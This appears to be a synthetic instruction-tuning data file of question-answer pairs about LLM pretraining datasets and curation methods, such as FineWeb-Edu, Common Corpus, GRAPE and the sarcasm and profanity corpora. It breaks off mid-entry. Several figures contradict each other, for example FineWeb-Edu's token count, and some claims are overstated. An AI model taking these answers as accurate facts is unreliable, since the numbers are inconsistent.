1 line
1.2 MiB
Plaintext
1 line
1.2 MiB
Plaintext
{"entries":[{"source":"english-master","instruction":"Explain what the 'brute-force approach' to training Large Language Models refers to, according to the document.","output":"The brute-force approach in LLM training means using massive, unfiltered web data without careful selection. It prioritizes quantity over quality, resulting in models that are statistically fluent (generate plausible text) but functionally brittle (fail at complex or subtle language tasks)."},{"source":"english-master","instruction":"Explain what FineWeb-Edu is and how its educational score filtering works.","output":"FineWeb-Edu is a dataset of 5.4 trillion tokens derived from FineWeb (which came from Common Crawl snapshots). It uses an automated educational quality classifier: first, the Llama-3-70B-Instruct model annotates 460,000 candidate texts with an additive score (0-5). Then a linear regressor built on Snowflake-arctic-embed-m embeddings predicts educational scores for all texts. Only documents scoring 3 or higher are kept, ensuring the model trains on structured, academically rigorous content rather than noisy web chatter."},{"source":"english-master","instruction":"Explain what the Common Corpus is and why it addresses the 'open data paradox'.","output":"The Common Corpus is a 2-trillion-token dataset (2,003,039,184,047 tokens) of permissibly licensed data. It solves the 'open data paradox' — the conflict between wanting open access to data and respecting copyright/ethical constraints — by meticulously sourcing public domain texts (classic literature, historical newspapers, government documents, legal case law) and documenting their provenance exhaustively. This allows LLMs to train legally and ethically while accessing high-quality, diverse English registers."},{"source":"english-master","instruction":"Explain what JFLEG is and how it differs from traditional grammar datasets.","output":"JFLEG (JHU Fluency-Extended GEC) is a gold-standard dataset for Grammatical Error Correction. Unlike traditional grammar datasets that focus only on isolated spelling or tense errors, JFLEG emphasizes holistic fluency edits. It requires the model to rewrite entire sentences so they flow naturally, teaching the LLM the rhythm, cadence, and idiomatic structuring of native-level prose rather than just fixing discrete mistakes."},{"source":"english-master","instruction":"Explain what CoNLL-U format is and how it helps LLMs understand complex sentence structure.","output":"CoNLL-U is a standard format for Universal Dependencies that provides explicit annotations across 10 distinct fields per token, including morphological features, part-of-speech tags, and dependency relations (e.g., subject, object, modifier). Training an LLM on CoNLL-U annotated data forces it to perform step-by-step reasoning over syntactic heads before predicting dependency labels. This prevents the model from relying on shallow pattern matching and instead requires it to map the exact grammatical relationship between every word in a sentence, enabling comprehension of highly complex, multi-clause structures."},{"source":"english-master","instruction":"Explain what the S2ORC dataset is and why it is important for achieving PhD-level English proficiency.","output":"S2ORC (Semantic Scholar Open Research Corpus) is an unparalleled dataset for academic training, comprising structured full text, abstracts, and metadata for over 10 million open-access English academic papers. It is critically important for PhD-level proficiency because it saturates the model with high-density scientific text — precise, unambiguous terminology, formal argumentation structures, and citation-dense exposition. Training on S2ORC expands the model's vocabulary to include expert-level discourse across disciplines, enabling it to generate publication-ready scientific prose rather than conversational approximations."},{"source":"english-master","instruction":"Explain what Chain-of-Thought (CoT) prompting is and how the CoT Collection trains LLMs to reason step-by-step.","output":"Chain-of-Thought (CoT) prompting is a technique that enables complex reasoning by forcing the model to explicitly generate intermediate reasoning steps before outputting a final conclusion. Rather than jumping directly from question to answer, the model produces a logical chain: 'First, ... Second, ... Therefore, ...'. The CoT Collection is a massive dataset containing 1.88 million CoT rationales across 1,060 distinct tasks. Continually fine-tuning on this collection instills a deliberate, multi-step problem-solving behavior that resists the urge to leap to linguistically coherent but logically flawed conclusions. This significantly enhances zero-shot accuracy on complex benchmarks like BIG-Bench-Hard."},{"source":"english-master","instruction":"Explain what the Philosophy-instruct dataset is and how it trains LLMs for abstract reasoning and wisdom.","output":"The Philosophy-instruct dataset is generated from the most significant philosophical texts available on Project Gutenberg, providing over 720,000 trainable tokens of multi-turn, instructional dialogue. Through continued pre-training and subsequent instruction tuning on these foundational texts, the LLM learns to navigate ethical dilemmas, construct Socratic dialogues, and weigh opposing viewpoints with intellectual maturity. This targeted exposure enables the model to transcend simple factual recall and provide deeply contemplated, balanced, and profoundly 'wise' answers to ambiguous human queries — precisely the capability that distinguishes a thoughtful scholar from a stochastic parrot."},{"source":"english-master","instruction":"Explain what the SARC dataset is and why it is indispensable for training sarcasm detection in LLMs.","output":"The SARC (Self-Annotated Reddit Corpus) is indispensable for sarcasm detection because it contains 1.3 million sarcastic comments scraped from Reddit, uniquely characterized by their heavy contextualization within preceding conversational turns. Sarcasm presents a unique computational challenge: the model must hold two contradictory semantic states simultaneously — the literal meaning of the text AND the intended, diametrically opposed meaning. Because sarcasm depends heavily on context and shared cultural knowledge, training on SARC forces the LLM to look beyond the immediate sentence boundary to analyze broader conversational history, speaker intent, and rhetorical patterns. Without this training, models interpret sarcastic statements literally, missing the pragmatic meaning entirely."},{"source":"english-master","instruction":"Explain what the Deceptive Humor Dataset (DHD) is and how it categorizes humor for LLM training.","output":"The Deceptive Humor Dataset (DHD) is a groundbreaking resource that categorizes humor into five specific archetypes: Dark Humor (jokes about taboo or morbid subjects), Irony (expressing meaning opposite to literal), Social Commentary (humor critiquing society or politics), Wordplay (puns and linguistic tricks), and Absurdity (illogical or surreal situations). Crucially, DHD grades each instance on a 'Satire Level' from 1 (subtle satire that may be mistaken for sincerity) to 3 (overt satire that is unmistakably humorous). Training on DHD allows the LLM to differentiate between a harmless phonetic pun and biting, deceptive social commentary that borders on misinformation. This granularity is essential for generating contextually appropriate humor without offending users or spreading deceptive content masquerading as jokes."},{"source":"english-master","instruction":"Explain what the Surge AI Profanities dataset is and how it categorizes offensive language for LLM training.","output":"The Surge AI Profanities dataset is a comprehensive resource cataloging over 1,600 English profanities and offensive terms. Each term is categorized by its semantic target — the type of offense it represents: sexual acts (e.g., explicit sex terms), bodily fluids (scatological references), physical attributes (body-shaming terms), or political offense (slurs targeting identity groups). More importantly, every term is graded on a severity scale from 1 (mild — casual swearing acceptable among friends) to 3 (severe — highly offensive terms that constitute harassment) based on human consensus ratings. By ingesting this structured data, the LLM learns the precise lexical weight and social consequence of each word, enabling it to distinguish between casual, acceptable banter among friends and severe, targeted harassment that should be filtered or avoided entirely."},{"source":"english-master","instruction":"Explain the four-stage data curation pipeline proposed in the document's conclusion for achieving world-class English proficiency.","output":"The document proposes a four-stage data curation pipeline. Stage 1: Foundational pre-training using FineWeb-Edu (5.4 trillion educationally filtered tokens) and Common Corpus (2 trillion permissibly licensed tokens) to build a pristine vocabulary and formal register while ensuring ethical compliance. Stage 2: Syntactic mastery through Grammatical Error Correction datasets (JFLEG, Lang-8), dependency parsing (CoNLL-U), and bridging anaphora training (GUMBridge) to achieve flawless, multi-clause grammar and paragraph-level cohesion. Stage 3: Cognitive reshaping using Chain-of-Thought Collection (1.88 million rationales), DeepResearch Bench (100 PhD-level tasks), and the GRAPE framework for distribution alignment — forcing the model to abandon shallow heuristics in favor of deep, step-by-step academic reasoning. Stage 4: Pragmatic fluency through literary corpora (Gutenberg, LiteraryTaste), sarcasm detection (SARC, PodSarc), humor understanding (Deceptive Humor Dataset), idiom comprehension (MAGPIE), and profanity mastery (Surge AI, Jigsaw) — elevating the model from a functional machine to a fluent, witty, native-like communicator."},{"source":"english-master","instruction":"Explain the updated token size and construction pipeline of FineWeb-Edu based on 2025 sources.","output":"FineWeb-Edu is a 1.3-trillion-token educational subset of the FineWeb corpus, which aggregates text from 96 Common Crawl snapshots. The pipeline includes: (1) extraction via trafilatura for HTML-to-text; (2) heuristic quality filters (terminal punctuation, duplicated lines); (3) per-snapshot MinHash deduplication with 5-grams; and (4) educational quality filtering where Llama-3-70B-Instruct annotates 460,000 candidates, a linear regressor on Snowflake-arctic-embed-m embeddings predicts scores 0–5, and documents scoring ≥3 are retained."},{"source":"english-master","instruction":"Explain the six principal collections of Common Corpus and their token distributions.","output":"Common Corpus comprises six principal collections: (1) Open Government (406 billion tokens) – administrative, legal, and fiscal texts from sources like SEC, WTO, and EU documents; (2) Open Culture (886 billion tokens) – digitized monographs, newspapers, and periodicals across 13+ languages; (3) Open Science (281 billion tokens) – openly licensed scientific publications from OpenAlex, arXiv, theses, and clinical trials; (4) Open Code (283 billion tokens) – permissively licensed code from Stack v1/v2 across 600+ programming languages; (5) Open Web (73 billion tokens) – Wikipedia, Wikisource, StackExchange, and YouTube transcripts; (6) Open Semantic (68 billion tokens) – natural language renditions of Wikidata in 300 languages. Total exceeds 2 trillion tokens across 517+ million documents."},{"source":"english-master","instruction":"Explain the S2ORC dataset's scale and what structured information it provides beyond raw text.","output":"S2ORC (Semantic Scholar Open Research Corpus) is a large corpus of 81.1 million English-language academic papers spanning many academic disciplines. It provides rich metadata (title, authors, year, venue), paper abstracts, resolved bibliographic references linking citations to their source papers, and structured full text for 8.1 million open access papers. The full text is annotated with automatically-detected inline mentions of citations, figures, and tables, each linked to their corresponding paper objects. This structure enables research on citation networks, figure/table extraction, and fine-grained scientific text mining."},{"source":"english-master","instruction":"Explain the CoNLL-U format and its 10-field annotation structure for universal dependencies.","output":"CoNLL-U (Computational Natural Language Learning – Universal) is a tab-separated format with 10 fields per token: (1) ID – token index; (2) FORM – word form; (3) LEMMA – base form; (4) UPOS – universal part-of-speech; (5) XPOS – language-specific POS; (6) FEATS – morphological features (e.g., Tense=Past, Number=Sing); (7) HEAD – index of syntactic head; (8) DEPREL – dependency relation to head (e.g., nsubj, obj, amod); (9) DEPS – enhanced dependencies; (10) MISC – additional annotations (e.g., bridging anaphora). This structure enables explicit encoding of complete syntactic structure for each sentence."},{"source":"english-master","instruction":"Explain the core hypothesis and selection mechanism of the GRAPE framework for instruction tuning.","output":"GRAPE (which stands for the framework proposed in 'The Best Instruction-Tuning Data are Those That Fit') is a supervised fine-tuning (SFT) framework based on the hypothesis that SFT is most effective when the data aligns with the model's pretrained distribution. For each instruction, GRAPE gathers multiple responses from various LLMs (or human annotators), computes the probability of each response according to the target model's distribution, and selects the response with the highest probability. Standard SFT is then performed only on these probabilistically aligned responses, producing supervision that is distributionally well-matched to the model rather than imitative of an external teacher."},{"source":"english-master","instruction":"Explain what The Pile dataset is and its 22 diverse sources according to 2025 documentation.","output":"The Pile is an 825 GB English-language dataset combining 22 diverse, high-quality sources. Key sources include: PubMed Central (biomedical literature), arXiv (physics, math, CS preprints), GitHub (code repositories), USPTO (patents), FreeLaw (legal opinions), and PhilPapers (philosophy). The diversity of domains forces the model's embedding space to map highly specialized, domain-specific vocabularies, improving performance on academic question-answering tasks. The dataset excludes low-quality web text, prioritizing curated, professional sources."},{"source":"english-master","instruction":"Explain the ProX (Programming Every Example) framework and its sample-wise rule generation approach for data refinement.","output":"ProX (Programming Every Example) is a framework that treats data refinement as a code generation task. A lightweight 0.3B-parameter language model writes and executes small, targeted programs for every individual record in a dataset. These programs perform operations such as string normalization, HTML tag stripping, duplicate sentence removal, or regex-based pattern replacement. Unlike fixed heuristics applied uniformly, ProX generates record-specific cleaning logic based on the content of each document. This approach scales to massive datasets like C4 (750 GB), RedPajama-V2, and DCLM, producing a pristine corpus free of typographical noise and formatting artifacts."},{"source":"english-master","instruction":"Why does the author claim that a model trained with brute-force data is 'statistically fluent but functionally brittle'? Provide logical steps based on the text.","output":"Step 1: Brute-force training relies on sheer, unfiltered data volume from web crawls. Step 2: Such data contains noise, contradictions, and shallow patterns. Step 3: The model learns statistical correlations (fluency) but not true understanding of syntax, pragmatics, or reasoning. Step 4: When faced with complex English (e.g., philosophical arguments, bridging anaphora, sarcasm), the model produces coherent-sounding but logically or contextually wrong answers (brittleness). Hence, functional brittleness emerges from lack of deep linguistic structure in training."},{"source":"english-master","instruction":"Why does training on educationally filtered web data (FineWeb-Edu) improve MMLU and ARC scores more than raw web data? Provide a logical chain.","output":"Step 1: Raw web crawls include forums, personal blogs, and low-credibility sources with fragmented or contradictory information. Step 2: Educational filtering (score ≥3) selects texts that exhibit structured exposition, logical flow, and academic rigor. Step 3: Pre-training on such data teaches the model to recognize coherent argumentation and factual consistency. Step 4: MMLU and ARC benchmarks test multi-task understanding and reasoning — tasks that require structured knowledge. Step 5: Hence, the model generalizes better to these benchmarks, producing the observed 12% and 24% gains respectively."},{"source":"english-master","instruction":"Why does the document claim that including legal and financial data from Common Corpus helps the model achieve a 'formal, precise, and professional register'? Provide logical steps.","output":"Step 1: Legal and financial documents are characterized by high information density, precise terminology, conditional logic, and minimal ambiguity. Step 2: The Common Corpus includes 406.6 billion tokens from these domains (case law, patents, financial filings). Step 3: During pre-training, the model's embedding space learns the statistical and syntactic patterns unique to this register. Step 4: When the model later encounters a query requiring formal output (e.g., regulatory analysis, contract interpretation), it can seamlessly adopt that register. Step 5: Thus, exposure to legal/financial data directly enables a formal, precise, professional tone."},{"source":"english-master","instruction":"Why is it important that an LLM understands the difference between native speaker errors and non-native speaker errors? Provide logical reasoning based on the text.","output":"Step 1: Native English speakers typically err on punctuation (e.g., comma splices), spelling (homophones like 'their/there'), and run-on sentences. Step 2: Non-native speakers typically err on determiners (a/an/the), articles, preposition usage, and subject-verb agreement. Step 3: If an LLM only trains on non-native corrections (e.g., learner corpora), it may overcorrect native-like informal writing. Step 4: If it only trains on native corrections, it may fail to understand systematic second-language errors. Step 5: Training on C4_200M (synthetic errors) plus Lang-8 ensures the model is robust against all forms of input degradation, making it capable of correcting both a native speaker's typo and a learner's article mistake."},{"source":"english-master","instruction":"Why does mastery of bridging anaphora serve as the 'definitive dividing line' between a mediocre LLM and an excellent one? Provide logical steps.","output":"Step 1: Bridging anaphora requires the model to infer unstated relationships between entities (e.g., 'door' belongs to 'house' without explicit restatement). Step 2: A model lacking this skill will either repeat the antecedent ('The house has a door. The house's door is red') or lose coherence entirely. Step 3: This results in disjointed, repetitive, or confusing paragraphs that fail to maintain logical flow. Step 4: A model trained on GUMBridge learns to maintain implicit referential chains across sentences without restating nouns. Step 5: This enables cohesive paragraphs where each sentence logically follows from the previous one. Step 6: Therefore, bridging anaphora mastery is the definitive dividing line between a model that merely generates sentences and one that writes coherent, deeply intertwined prose."},{"source":"english-master","instruction":"Why does expanding answer options from 4 to 10 (as in MMLU-Pro) eliminate the possibility of success through random guessing? Provide probabilistic reasoning.","output":"Step 1: With 4 answer options, random guessing yields a 25% baseline accuracy. Step 2: With 10 answer options, random guessing drops to 10% baseline. Step 3: However, the elimination is not just about probability — it's about distractor quality. Step 4: With only 3 distractors, it's easier to eliminate wrong answers using surface cues (e.g., length, keyword overlap, common phrases). Step 5: With 9 distractors, many will share surface features, domain vocabulary, and plausible phrasing with the correct answer. Step 6: A model relying on shallow heuristics (e.g., 'match the keywords from the question') will fail because multiple options match. Step 7: Only a model with deep conceptual understanding — not pattern matching — can reliably identify the correct answer among 10 highly plausible distractors. Thus, MMLU-Pro forces genuine graduate-level comprehension."},{"source":"english-master","instruction":"Why does aligning SFT data with the model's pre-trained distribution (GRAPE) produce better results than using more data? Provide logical steps.","output":"Step 1: A model's pre-trained weights represent a specific probability distribution over tokens — what it has learned about language from vast pre-training. Step 2: Traditional SFT often uses instructional data that is out-of-distribution compared to this pre-trained knowledge (e.g., different style, format, or reasoning patterns). Step 3: Out-of-distribution fine-tuning forces the model to override its learned representations, leading to catastrophic forgetting or degraded robustness. Step 4: GRAPE solves this by selecting, for each instruction, the response that best matches the model's existing probability distribution. Step 5: This preserves the model's core knowledge while adding instruction-following capabilities. Step 6: Because the model doesn't have to 'unlearn' or radically adapt, it learns faster and with less data. Step 7: Hence, a smaller model with GRAPE-selected data (1/3 the data, half the epochs) outperforms a baseline trained on 4.5x more unaligned data."},{"source":"english-master","instruction":"Why is training on parallel stylistically distinct versions of the Bible (same content, different style) effective for teaching text style transfer? Provide logical steps.","output":"Step 1: Text Style Transfer (TST) requires the model to change the stylistic form of text (e.g., formal → casual, archaic → modern) while preserving semantic content exactly. Step 2: Most datasets lack ground-truth pairs where meaning is identical but style differs. Step 3: The Bible, however, exists in multiple stylistically distinct English versions (e.g., King James Version: archaic, formal; New International Version: modern, accessible). Step 4: Across these versions, the underlying semantic content (theological narratives, parables, teachings) remains identical. Step 5: This creates a perfect parallel corpus: aligned sentence pairs where meaning is constant but vocabulary, syntax, and register vary widely. Step 6: Training on this data (evaluated via BLEU and PINC metrics) teaches the model the precise mechanics of paraphrasing — which words can be substituted, which syntactic structures can be reorganized, and how to maintain semantic fidelity across radical stylistic shifts. Step 7: The model learns that 'he spake unto them' and 'he said to them' are semantically equivalent but stylistically distinct, enabling sophisticated rhetorical adaptation."},{"source":"english-master","instruction":"Why does sarcasm detection require the model to hold 'two contradictory semantic states simultaneously'? Provide logical reasoning with an example.","output":"Step 1: Sarcasm operates by uttering a statement whose literal meaning is the opposite of the speaker's intended meaning. Step 2: Example: During a torrential downpour, someone says, 'Beautiful day, isn't it?' Step 3: Literal semantic state: The speaker is asserting that the day is beautiful (positive evaluation of weather). Step 4: Intended semantic state: The speaker means the exact opposite — the weather is terrible, and they are complaining ironically. Step 5: To understand this utterance correctly, the LLM must simultaneously represent BOTH meanings in its activation space. Step 6: It must recognize the literal meaning (what the words say) AND the intended meaning (what the speaker actually means). Step 7: Then it must detect the contradiction between these two states and infer that the contradiction is deliberate, signaling sarcasm rather than error or confusion. Step 8: Models without this capability either (a) take the statement literally and fail to detect sarcasm, or (b) classify all contradictions as errors. Training on SARC teaches the model to maintain and compare these dual representations."},{"source":"english-master","instruction":"Why do idioms present a 'semantic opacity' problem for LLMs, and how does varied contextual training solve it? Provide logical steps.","output":"Step 1: Idioms are semantically opaque — their meaning cannot be derived from the literal definitions of their constituent words. For example, 'spill the beans' has nothing to do with spilling or beans; it means 'reveal a secret'. Step 2: If an LLM sees an idiom only in one fixed context (e.g., 'He spilled the beans about the surprise'), it may memorize the pattern 'spill the beans' → 'reveal secret' without understanding the underlying mapping. Step 3: When it encounters a novel syntactic variation ('The beans were spilled by the whistleblower'), it fails because the pattern is disrupted. Step 4: MAGPIE solves this by providing each of 1,756 idioms across multiple, highly varied textual contexts — different syntactic positions, different surrounding vocabulary, different semantic domains. Step 5: By seeing 'spill the beans' in 30+ distinct contexts, the model abstracts the invariant non-literal meaning from the variable surface forms. Step 6: This forces genuine idiom comprehension rather than shallow pattern matching, enabling the model to understand 'the beans were spilled' as readily as 'he spilled the beans.'"},{"source":"english-master","instruction":"Why does the document claim that 'ignorance of profanity leads to a brittle, easily bypassed model' while 'total mastery of it allows for nuanced content moderation'? Provide logical steps.","output":"Step 1: An LLM trained without profanity data has no representation of offensive words in its vocabulary or embedding space. Step 2: Such a model cannot recognize profanity when it appears in user inputs — it sees 'f---' or 's--t' as unknown tokens or normal words. Step 3: Malicious users exploit this by using misspelled profanity, homophones (e.g., 'sheet' for 'shit'), or creative variations to bypass content filters. The model is 'brittle' because it fails at the exact edge cases it needs to catch. Step 4: Conversely, a model with total mastery of profanity (via Surge AI and Jigsaw) knows: (a) the exact lexical form of every profanity, (b) its severity score (1-3), (c) its semantic target, and (d) contextual indicators of hostile intent. Step 5: This enables gradient moderation: severity 1 in friendly context → allow; severity 1 in hostile context → warn; severity 3 → block entirely; identity-based hate → rewrite or refuse. Step 6: The model can also distinguish 'I f---ing love this' (positive emphasis) from 'You are a f---ing [slur]' (targeted harassment). Step 7: Thus, mastery enables nuanced, context-aware safety, while ignorance creates easily bypassed filters."},{"source":"english-master","instruction":"Why does the document claim that 'ignorance of profanity leads to a brittle, easily bypassed model' while simultaneously arguing that profanity datasets are essential for world-class English? Resolve this apparent paradox.","output":"Step 1: The apparent paradox arises from conflating 'knowing profanity' with 'endorsing profanity.' Step 2: A model ignorant of profanity has no representation of offensive words in its vocabulary — it cannot recognize them in user inputs. Step 3: This ignorance creates safety vulnerabilities: malicious users can use profanity to attack others, and the model cannot detect or moderate it. Step 4: Furthermore, the model cannot generate period-authentic dialogue for creative writing (e.g., a Quentin Tarantino script) or understand user intent when profanity is used harmlessly ('This is f---ing amazing!'). Step 5: A model with profanity mastery (via Surge AI and Jigsaw) knows: severity scores (1-3), semantic targets (sexual, scatological, identity-based), and contextual indicators of hostile intent. Step 6: This enables nuanced moderation: the model can block severe targeted harassment (severity 3, identity-based hate), rewrite milder profanity in formal contexts, and allow casual profanity in appropriate roleplay scenarios. Step 7: Thus, mastery enables ethical boundary adherence; ignorance enables neither safety nor authentic communication. World-class English requires understanding ALL registers — including profanity — so the model can navigate them appropriately, not so it can abuse them."},{"source":"english-master","instruction":"Why does the FineWeb-Edu classifier use a regression head on Snowflake-arctic-embed-m embeddings rather than a pure classification model? Provide logical steps.","output":"Step 1: Educational quality is a spectrum, not a binary label. Some texts are moderately educational (score 3), others highly educational (score 5). Step 2: A binary classifier would collapse this nuance, forcing texts into 'educational' or 'not educational' categories. Step 3: A regression head with a 0–5 output preserves granularity. Step 4: The classifier uses a frozen Snowflake-arctic-embed-m encoder and trains only the regression head for 20 epochs, preserving the embedding space's semantic richness. Step 5: After training, documents with scores ≥3 are retained as FineWeb-Edu. This allows flexible threshold adjustment and yields an 82% binary F1 score when thresholded at 3."},{"source":"english-master","instruction":"Why does Common Corpus include Open Code (283B tokens) when the document focuses on English proficiency? Provide logical steps.","output":"Step 1: English proficiency at a PhD level includes technical and mathematical English, not just literary or conversational registers. Step 2: Programming languages embody strict formal grammars, unambiguous semantics, and logical control flow — properties that mirror mathematical proofs and technical specifications. Step 3: Training on 283 billion tokens of code across 600+ languages exposes the model to variable naming conventions, comment structures, documentation strings, and error messages. Step 4: This cross-training improves the model's ability to generate and understand highly structured, unambiguous technical English. Step 5: Models trained on code data consistently perform better on reasoning tasks (MMLU, ARC) and mathematical benchmarks, directly supporting the document's goal of graduate-level English proficiency."},{"source":"english-master","instruction":"Why is structured full text (with resolved bibliographic references) more valuable for PhD-level English training than plain abstracts alone? Provide logical steps.","output":"Step 1: Abstracts provide condensed summaries but lack the detailed argumentation, methodology, and evidence chains found in full papers. Step 2: PhD-level English requires understanding how scientific claims are supported — through experimental results, mathematical derivations, or citations to prior work. Step 3: Structured full text with resolved bibliographic references explicitly links each claim to its supporting evidence. Step 4: The model learns discourse patterns: 'As shown in Figure 3', 'consistent with previous findings (Smith et al., 2020)', 'therefore we conclude that...'. Step 5: By observing citation contexts, the model learns which claims require external support and how to integrate references naturally. Step 6: This produces a model that generates citation-dense, evidence-backed scientific prose rather than unsupported assertions."},{"source":"english-master","instruction":"Why does predicting part-of-speech tags before dependency labels improve parsing accuracy? Provide a cognitive reasoning chain.","output":"Step 1: Dependency parsing requires identifying which word is the root and how all other words relate to their syntactic heads. Step 2: Without POS information, the model must consider all possible head-dependent pairs simultaneously. Step 3: POS tags provide category-level constraints: only verbs can be roots, only nouns can be nominal subjects (nsubj), only adjectives can be adjectival modifiers (amod). Step 4: By forcing the model to predict POS tags first, it must commit to word categories before relations. Step 5: These POS predictions reduce the dependency search space: given a verb token, possible dependency relations include root, aux, xcomp; given a noun, possible relations include nsubj, obj, nmod. Step 6: This stepwise decomposition mimics how humans parse sentences: first identify word classes, then assign grammatical relations. Step 7: The result is higher accuracy and elimination of hallucinated relations that violate POS constraints."},{"source":"english-master","instruction":"Why does training on out-of-distribution SFT data lead to diminishing returns or performance degradation? Provide logical steps.","output":"Step 1: A pretrained LLM has learned a specific probability distribution over tokens from vast pretraining on diverse text. Step 2: Standard SFT data often comes from other LLMs or humans, producing responses that may differ stylistically, structurally, or factually from what the target model would naturally generate. Step 3: When the model fine-tunes on such out-of-distribution data, it must adjust its weights to assign higher probability to response patterns that are foreign to its learned distribution. Step 4: This adjustment can overwrite or degrade the original capabilities (catastrophic forgetting) and may produce brittle performance on tasks not covered by the SFT data. Step 5: GRAPE selects responses that the target model already assigns high probability to — these responses are 'in distribution' by definition. Step 6: Fine-tuning on in-distribution data requires minimal weight adjustment, preserving original capabilities while adding instruction-following. Step 7: Hence, GRAPE achieves superior results with less data, avoiding the diminishing returns of out-of-distribution SFT."},{"source":"english-master","instruction":"Why does The Pile exclude low-quality web data in favor of curated sources, unlike FineWeb which includes filtered web text? Compare the two approaches.","output":"Step 1: The Pile and FineWeb represent two different philosophies for pretraining data curation. Step 2: The Pile selects only specific high-quality domains (PubMed, arXiv, GitHub, USPTO, FreeLaw) and explicitly excludes general web text. This guarantees quality but limits scale and diversity of writing styles. Step 3: FineWeb (and its FineWeb-Edu subset) includes web text from Common Crawl but applies filtering (educational scoring, heuristics, deduplication). This allows massive scale (15 trillion tokens raw, 1.3 trillion filtered) but risks residual web noise. Step 4: The Pile's approach is safer for domain-specific tasks (legal, medical, code) but may miss the linguistic diversity of web-written English (blogs, forums, news). Step 5: FineWeb's approach captures broader registers but requires more sophisticated filtering. Step 6: Optimal pretraining may combine both: The Pile for high-precision domains, FineWeb-Edu for general educational text, and Common Corpus for ethically licensed diversity."},{"source":"english-master","instruction":"Why is sample-wise rule generation (ProX) more effective than fixed heuristics for data cleaning at scale? Provide logical steps.","output":"Step 1: Web-sourced text contains diverse, document-specific noise patterns: some have HTML tables, others have LaTeX math, others have JSON snippets, others have multilingual sections. Step 2: Fixed heuristics (e.g., 'remove all HTML tags') apply the same transformation to every document, either missing noise (if the heuristic is too narrow) or over-cleaning (if too aggressive). Step 3: ProX treats each document as a unique case, generating a custom cleaning program for that document only. Step 4: The 0.3B LM examines the document content and writes specific rules: for a document with markdown tables, it generates table-flattening code; for a document with JSON, it generates JSON extraction code; for a document with LaTeX, it generates LaTeX-to-plaintext conversion. Step 5: Each program is executed, and the cleaned document is produced. Step 6: This sample-wise adaptation handles the long tail of formatting anomalies that fixed heuristics miss, producing a higher-quality corpus with fewer artifacts."},{"source":"english-master","instruction":"Summarize the main claim made in the first paragraph of the document about achieving world-class English proficiency in LLMs.","output":"To build an LLM with world-class English proficiency (graduate-level reasoning, grammatical precision, deep contemplation, and colloquial pragmatics), researchers must abandon the brute-force method of unfiltered web data. Instead, a paradigm shift toward meticulously stratified data curation is required to overcome the functional brittleness of statistically fluent models."},{"source":"english-master","instruction":"Summarize the empirical benefits of pre-training on FineWeb-Edu as reported in the document.","output":"Pre-training on FineWeb-Edu yields significant performance improvements: a 12% relative gain on the Massive Multitask Language Understanding (MMLU) benchmark, raising accuracy from 33% to 37%, and a 24% gain on the AI2 Reasoning Challenge (ARC), raising scores from 46% to 57%. These gains demonstrate that educational filtering directly enhances academic reasoning and factual consistency."},{"source":"english-master","instruction":"Summarize the domain-specific subsets of the Common Corpus and their linguistic benefits.","output":"The Common Corpus includes two key English subsets: (1) Open Culture with 885.9 billion tokens from classic literature, historical newspapers, and cultural heritage texts — preventing temporal myopia by teaching archaic vocabulary and classical sentence structures. (2) Open Government with 406.6 billion tokens from financial documents (Finance Commons) and legal case law (Legal Commons from Free Law Project, EUR-Lex, USPTO) — enabling the model to adopt a highly formal, precise, professional register for complex regulatory or economic subjects."},{"source":"english-master","instruction":"Summarize the key findings about the Lang-8 dataset and its role in grammatical error detection.","output":"The Lang-8 dataset contains over 2.3 million rows of language learner errors manually corrected by native speakers. Fine-tuning transformer models on cleaned iterations achieves an F1 score of 0.91 and 90.53% accuracy for Grammatical Error Detection. Critically, native and non-native speakers make different error types: native speakers struggle with punctuation and spelling, while non-native speakers struggle with determiners and articles. Training on Lang-8 ensures robustness against all error types."},{"source":"english-master","instruction":"Summarize what bridging anaphora is and how the GUMBridge corpus trains LLMs to handle it.","output":"Bridging anaphora is a linguistic phenomenon where a newly introduced entity is understood solely through its relation to a previously mentioned, non-identical entity (e.g., 'There is a house. The door is red' — 'the door' is inferable as belonging to 'the house'). The GUMBridge corpus, a subset of the Georgetown University Multilayer corpus, spans 24 diverse English genres with granular annotations for bridging anaphora. Training on GUMBridge forces the LLM to develop deep contextual memory and complex coreference resolution skills, marking the dividing line between disjointed sentence generation and cohesive, logically flowing paragraphs."},{"source":"english-master","instruction":"Summarize the GPQA and MMLU-Pro benchmarks and how they evaluate graduate-level reasoning.","output":"GPQA (Graduate-Level Google-Proof Q&A) contains highly complex questions in physics, chemistry, and biology requiring deep subject-matter knowledge, calculation, and concept synthesis. These questions are explicitly designed to be unsolvable by simple search engines, forcing the model to rely on internalized academic logic. MMLU-Pro represents a significant escalation from the original MMLU benchmark: it includes 12,000 high-quality academic exam questions spanning 14 major fields, with answer options expanded from 4 to 10. This expanded distractor set eliminates random guessing or shallow heuristic matching, requiring extreme confidence and precision in knowledge retrieval."},{"source":"english-master","instruction":"Summarize the GRAPE framework and its efficiency benefits for instruction tuning.","output":"The GRAPE framework revolutionizes Supervised Fine-Tuning (SFT) by aligning instructional data with the model's inherent pre-trained probability distribution. For each instruction, GRAPE gathers responses from multiple sources (human annotators or larger oracle models) and selects the specific response that most closely matches the target model's pre-trained distribution. Standard SFT then runs only on these probabilistically aligned responses. In controlled experiments on Ultralnteract and OpenHermes-2.5, GRAPE-selected data yielded absolute gains up to 13.8% across benchmarks. Remarkably, using GRAPE to subsample post-training data, a smaller model (LLaMA-1-8B) required only one-third of the data and half the training epochs to exceed baselines trained on 4.5 times more data."},{"source":"english-master","instruction":"Summarize the LiteraryTaste dataset and how it captures nuanced human preferences for writing style.","output":"The LiteraryTaste dataset captures nuanced human preferences for creative writing style. It contains 100 pairs of short creative writing texts, annotated by 60 individuals who detailed their revealed preferences (what they actually enjoyed reading) versus stated preferences (what they claimed to like). Fine-tuning a transformer encoder on this dataset achieves over 75% accuracy in modeling revealed personal preferences. This allows the LLM to adapt its prose dynamically — shifting seamlessly from the ornate, polysyllabic elegance of Victorian literature to the punchy, minimalist clarity of modern journalism — based entirely on the user's implicit needs and preferences."},{"source":"english-master","instruction":"Summarize the PodSarc dataset and how it complements SARC for sarcasm detection.","output":"The PodSarc dataset offers a large-scale collection of sarcastic speech derived from podcasts. With an average of 31.18 words spanning 9.61 seconds per segment, this dataset provides lengthy, dialogue-heavy contexts necessary for detecting conversational shifts, rhetorical questions, and deadpan delivery. It complements SARC by capturing the nuances of spoken English translated into text — features like prosody, timing, and intonation patterns that are implicit in speech but absent from written Reddit comments. Together, these datasets ensure the LLM can detect sarcasm whether it appears in informal online writing or transcribed conversation, a critical capability for true native-level pragmatic understanding."},{"source":"english-master","instruction":"Summarize how the MAGPIE and IDEM datasets train LLMs to understand idiomatic 